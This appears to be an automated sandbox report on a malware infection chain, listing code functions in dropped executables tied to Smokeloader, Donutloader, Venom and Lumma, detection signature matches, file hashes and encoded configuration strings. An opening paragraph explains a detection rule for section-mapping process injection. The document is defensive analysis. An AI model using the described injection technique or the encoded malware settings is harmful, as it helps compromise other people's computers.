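Matching is on ordered subsequences, so a function that merely imports BitBlt or happens to call NtMapViewOfSection once never fires. The section-mapping rule encodes the pattern in function 0_2_00401513 above: NtCreateSection once, NtMapViewOfSection twice, which is how a payload is mapped into a second process without WriteProcessMemory; the report's separate "Allocates memory in foreign processes" and "Creates a thread in another existing process" signatures are the dynamic confirmation of what this static chain suggests.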
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64160E810 7_2_00007FF64160E810
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6415F64A0 7_2_00007FF6415F64A0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64163B6B0 7_2_00007FF64163B6B0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64160BAB0 7_2_00007FF64160BAB0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641678AB0 7_2_00007FF641678AB0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64161B6A0 7_2_00007FF64161B6A0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641643E80 7_2_00007FF641643E80
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641642080 7_2_00007FF641642080
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641621880 7_2_00007FF641621880
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641645860 7_2_00007FF641645860
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6415F1450 7_2_00007FF6415F1450
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641600050 7_2_00007FF641600050
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64164CC40 7_2_00007FF64164CC40
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641601920 7_2_00007FF641601920
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641673F20 7_2_00007FF641673F20
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641631510 7_2_00007FF641631510
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641605910 7_2_00007FF641605910
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641651700 7_2_00007FF641651700
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6415FA0F0 7_2_00007FF6415FA0F0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6416304D0 7_2_00007FF6416304D0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641613AD0 7_2_00007FF641613AD0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6415F5AD4 7_2_00007FF6415F5AD4
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641605ED0 7_2_00007FF641605ED0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6416716C0 7_2_00007FF6416716C0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6416343B0 7_2_00007FF6416343B0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64160D7A0 7_2_00007FF64160D7A0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64165898B 7_2_00007FF64165898B
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64161D390 7_2_00007FF64161D390
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641655B80 7_2_00007FF641655B80
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641676B70 7_2_00007FF641676B70
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641654370 7_2_00007FF641654370
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64164F370 7_2_00007FF64164F370
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6415FFB70 7_2_00007FF6415FFB70
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641647D60 7_2_00007FF641647D60
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641633150 7_2_00007FF641633150
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641639550 7_2_00007FF641639550
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641620740 7_2_00007FF641620740
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641665D40 7_2_00007FF641665D40
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641629830 7_2_00007FF641629830
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64166C230 7_2_00007FF64166C230
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64164E430 7_2_00007FF64164E430
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641603E30 7_2_00007FF641603E30
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64164B020 7_2_00007FF64164B020
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6415FC400 7_2_00007FF6415FC400
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641607000 7_2_00007FF641607000
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6415FBC00 7_2_00007FF6415FBC00
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64161FC10 7_2_00007FF64161FC10
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641648C10 7_2_00007FF641648C10
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641652010 7_2_00007FF641652010
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641664E10 7_2_00007FF641664E10
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641614E00 7_2_00007FF641614E00
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641646DF0 7_2_00007FF641646DF0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6416411F0 7_2_00007FF6416411F0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64160CFF0 7_2_00007FF64160CFF0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6416749F0 7_2_00007FF6416749F0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641604BF0 7_2_00007FF641604BF0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641636DE0 7_2_00007FF641636DE0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6416229E0 7_2_00007FF6416229E0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64161A9D0 7_2_00007FF64161A9D0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64166DFD0 7_2_00007FF64166DFD0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6416357C0 7_2_00007FF6416357C0
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAC3430 10_2_00007FFD9BAC3430
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAC4196 10_2_00007FFD9BAC4196
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAC51C8 10_2_00007FFD9BAC51C8
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAC970C 10_2_00007FFD9BAC970C
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAC4752 10_2_00007FFD9BAC4752
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAD14D0 10_2_00007FFD9BAD14D0
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAD0928 10_2_00007FFD9BAD0928
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAD0F0D 10_2_00007FFD9BAD0F0D
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 12_2_00007FFD9BAB4182 12_2_00007FFD9BAB4182
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 12_2_00007FFD9BAB3BC6 12_2_00007FFD9BAB3BC6
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 12_2_00007FFD9BAB51C0 12_2_00007FFD9BAB51C0
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 12_2_00007FFD9BAB2EDF 12_2_00007FFD9BAB2EDF
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 12_2_00007FFD9BAB36CC 12_2_00007FFD9BAB36CC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9BAB63FB 14_2_00007FFD9BAB63FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9BAB3AFB 14_2_00007FFD9BAB3AFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9BAC10FA 14_2_00007FFD9BAC10FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9BAB6040 14_2_00007FFD9BAB6040
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9BAB0E35 14_2_00007FFD9BAB0E35
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03061B25 16_2_03061B25
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03071B52 16_2_03071B52
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03072290 16_2_03072290
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_030672DD 16_2_030672DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_030552E0 16_2_030552E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03067189 16_2_03067189
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03076F80 16_2_03076F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0308CD40 16_2_0308CD40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0306EC40 16_2_0306EC40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03083CD0 16_2_03083CD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0305FB10 16_2_0305FB10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0308D340 16_2_0308D340
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0308B350 16_2_0308B350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03056B70 16_2_03056B70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_030733B6 16_2_030733B6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03074BF0 16_2_03074BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03076210 16_2_03076210
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03057270 16_2_03057270
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0305C270 16_2_0305C270
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_030682CB 16_2_030682CB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03054900 16_2_03054900
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03058960 16_2_03058960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0308B160 16_2_0308B160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_030741A0 16_2_030741A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_030729C9 16_2_030729C9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0308A9E4 16_2_0308A9E4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0308D010 16_2_0308D010
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0308B840 16_2_0308B840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0306E086 16_2_0306E086
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03088880 16_2_03088880
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03076890 16_2_03076890
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0308B700 16_2_0308B700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03051F10 16_2_03051F10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03073F97 16_2_03073F97
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03064E68 16_2_03064E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03063678 16_2_03063678
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03083680 16_2_03083680
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03065E97 16_2_03065E97
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0308B5A0 16_2_0308B5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03053DD0 16_2_03053DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03055DE0 16_2_03055DE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0306EC06 16_2_0306EC06
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03070CB7 16_2_03070CB7
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8D7CC0 19_2_6C8D7CC0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8F5CD4 19_2_6C8F5CD4
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8D4CD0 19_2_6C8D4CD0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8E1C21 19_2_6C8E1C21
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8E4DE0 19_2_6C8E4DE0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8E8D6E 19_2_6C8E8D6E
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8D8E20 19_2_6C8D8E20
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8E2890 19_2_6C8E2890
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8E4930 19_2_6C8E4930
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8D2B21 19_2_6C8D2B21
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8DD5D0 19_2_6C8DD5D0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8DC010 19_2_6C8DC010
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8D92D0 19_2_6C8D92D0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8E0210 19_2_6C8E0210
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_00568C7E 19_2_00568C7E
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_028E1EC8 19_2_028E1EC8
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_028E2640 19_2_028E2640
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_028E1EB8 19_2_028E1EB8
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_05FF90B1 19_2_05FF90B1
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_05FF077C 19_2_05FF077C
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_05FF23C8 19_2_05FF23C8
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C864CD0 20_2_6C864CD0
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C867CC0 20_2_6C867CC0
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C885CD4 20_2_6C885CD4
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C871C21 20_2_6C871C21
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C874DE0 20_2_6C874DE0
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C878D6E 20_2_6C878D6E
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C868E20 20_2_6C868E20
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C872890 20_2_6C872890
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C874930 20_2_6C874930
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C862B21 20_2_6C862B21
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C86D5D0 20_2_6C86D5D0
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C86C010 20_2_6C86C010
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C8692D0 20_2_6C8692D0
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C870210 20_2_6C870210
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_0251167A 20_2_0251167A
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\2D42.exe 4F7DB945B8F377AD28938F23F283E04454818FA0D9C4C692A30BCE2D12B66389
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\8EC7.exe AF252D8F2C1166000A47BC52A23BA6DBEE07EE4ADF4DE833F633A33DB2AA2152
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\EF14.exe 505968DFF5E73B6DB05CAAA86EA34633140EC3B7BB75B19167AF7CE4AF641259
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 030593B0 appears 39 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 0305FCA0 appears 202 times
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: String function: 6C878D20 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: String function: 6C8E8D20 appears 35 times
Source: EF14.exe.1.dr Static PE information: Number of sections : 12 > 10
Source: 8EC7.exe.1.dr Static PE information: No import functions for PE file found
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Static PE information: No import functions for PE file found
Source: adjijwj.1.dr Static PE information: No import functions for PE file found
Source: 2D42.exe.1.dr Static PE information: No import functions for PE file found
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 19.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 19.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 26.2.vm.exe.4e30000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 26.2.vm.exe.4e30000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0000001A.00000002.3222675712.0000000006020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000003.00000002.1941543133.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000013.00000002.4107139559.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000014.00000002.3069005495.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000003.00000002.1941477566.00000000001A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1718024777.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001A.00000002.3108160771.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000014.00000002.3065926594.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 00000000.00000002.1717820306.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: adjijwj.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Static PE information: Section .text
Source: adjijwj.1.dr Static PE information: Section .text
Source: 19.2.vm.exe.4e40000.1.raw.unpack, Settings.cs Base64 encoded string: 'uv876R64GyPQROS6Pcq+tT2rujm6QhOA2jKz3+72iK0vssZ7tRu9W1NfcaQ5yk3K4leNInPIlyvrm/sWNe6YUSzW9MnjujJ8wA3fVO6kqY4=', 'tBbcnyqIuxWvE/Aa008Phm66l0gx08l3V72N0uezc1BvWV+aVFh/K2LjDSmziiX4d1we58iQkTKHp5hlA6J3ArDNNUTcH31I6D+8IIWmVEXPfFcr7grctRvtFWbh8/WW', 'vlrU2ttL4QCN9XP+miA1iO2Zi1Qo5KKeTfPUgLmvXsgl1b/ZXBNeN/RykY5FXUbGAFb/hcKmdGI2lxq9dyDNOg==', 'jajjt4fLdfeySHLjOUN+WU7vKFN/tv6flHwdN63QqNLvwdiPerPjqi8pJYhlDxutlcONhE6KmVeSyHLXzp1X0ivMLOia3ounzEFu+OufC35pSXOr0AgnutA9Hm2WMXLR5SrKu9Ep2d9bPbB7jBc3VXBVjkPHm+BjMjy64M6HAubGgc8bZ4x9RmkpsgBYOzwKBmFDp7rKGTxhnrnem674/IV8HtJhbUivlbelAfQbN92NlB/IZHSII0WCgZyWHfjXPeAh7ScQvm1glooPfQyjEFujB5EgoLg8/Q+UZ9OyLZY=', '/3HMGRMO5mfkdekqR4Zafv717iumQMzpVLF6A9pHRaBxVKyvDxb55/QnfojY3GM4MZFgEKqs9lZExa/oUaQFQQ==', 